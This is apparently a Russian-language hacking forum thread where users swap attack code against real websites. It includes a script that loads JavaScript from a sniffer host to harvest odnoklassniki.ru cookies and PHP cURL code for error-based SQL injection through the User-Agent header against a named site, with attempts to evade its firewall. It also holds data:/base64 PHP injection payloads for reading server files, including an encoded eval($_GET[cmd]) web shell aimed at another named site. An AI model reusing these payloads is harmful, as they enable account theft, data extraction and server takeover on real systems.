я хочу взломать странички одноклассники.ру и там ставить мой сципт не получится ))) я могу так собирать куки из одноклассники.ру и хочу это отправить в сниффер <div id="ok_group_widget"></div> <script> !function (d, id, did, st) { var js = d.createElement("script"); js.src = "http://snifer.ejan.ru/connect.js"; js.onload = js.onreadystatechange = function () { if (!this.readyState || this.readyState == "loaded" || this.readyState == "complete") { if (!this.executed) { this.executed = true; setTimeout(function () { OK.CONNECT.insertGroupWidget(id,did,st); }, 0); } }} d.documentElement.appendChild(js); }(document,"ok_group_widget","52864984219766","{width:250,height:335}"); </script>
Нашел скуль в User-Agent, запросы через GET обрубаются <h1>Forbidden</h1> <p>You don't have permission to access on this server.</p> поделитесь скриптом на php, для передачи User-Agent в Post-запросе. Сам написать не могу, знаний маловато
User-Agent - это не пост, это заголовок. Он передаётся и при GET и при POST запросах. PHP: <?php $curl = curl_init('http://site.ru/'); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_POST, 1); curl_setopt($curl, CURLOPT_USERAGENT, 'Firefox(user-agent)'); echo curl_exec($curl); ?> ПС Но похоже тебе это не поможет
как сюда уязвимый запрос правильно вставить? <?php $curl = curl_init('http://www.site.ru/'); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_POST, 1); curl_setopt($curl, CURLOPT_USERAGENT, ''and(select*from(select(name_const(version(),1)),name_const(version(),1))a)and''); echo curl_exec($curl); ?>
Верно. Я пропустил одну строчку в оригинале =( PHP: <?php $curl = curl_init('http://localhost/phpinfo.php'); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_POST, 1); curl_setopt($curl, CURLOPT_POSTFIELDS, ""); curl_setopt($curl, CURLOPT_USERAGENT, 'and(select*from(select(name_const(version(),1)),name_const(version(),1))a)and'); echo curl_exec($curl); ?> Попробуй так
Скрипт работает правильно, но версию не выводит, хотя при GET запросе вывод есть Duplicate column name '5.1.68-log' , дальше продвинутся не удается , все фильтруется. Выводить таблицы нужно через POST-запрос
Я видимо не совсем понимаю о чём речь. Этот скрипт как раз делает то что ты попросил, POST запрос с возможностью редактировать User-Agent. Если тебе нужно отправить какие-то параметры POST'ом то Если это всё не то, то приведи пример запроса.
Выкладываю GET http://www.guppik.ru/components/com_true/sub_votepic.php?id=1&user_rating=1 HTTP/1.1 Host: www.guppik.ru User-Agent: 'and(select*from(select(name_const(version(),1)),name_const(version(),1))a)and' теперь нужно это переделать под POST-запрос, для вывода таблиц
Ок, теперь всё ясно. Ещё раз повторю что User-Agent это заголовок, POST/GET на него не влияют. В данном случае WAF/IPS/... режет запросы в которых есть совпадение '*informa*'. Я минут десять потыкался, но рабочего варианта послать information_schema в User-Agent не нашёл.
И снова вопрос по site/account?mode==data:;base64,<?php include("http://site/path/file.*"); ?> с этим я разобрался,могу просматривать любые файлы и папки кроме файлов *.php ,как открыть php
site/account?mode==data:;base64,<?php echo file_get_contents("http://site/path/file.php"); ?> PS Только сейчас понял, путь-то надо указывать не с веба, а локальный. По типу: site/account?mode==data:;base64,<?php echo file_get_contents("/var/www/path/file.php"); ?>
работает что так <?php echo file_get_contents("http://site/path/file.php"); ?> что так <?php echo file_get_contents("/var/www/path/file.php"); ?> но файлы php не xочет показать
Ок, моя последняя догадка: возможно файлы читаются, но просто не отображаются в браузере. Попробуй посмотреть HTML код страницы(ctrl+f '<?').
Неудивительно, /bin/sh бинарный файл. Если хочешь скинь сюда или в ЛС ссылку. http://go.jetswap.com/account?mode=data:;base64,PD9waHAgZXZhbCgkX0dFVFtjbWRdKTsgPz4==&cmd=phpinfo%28%29; у меня не работает, пишет down.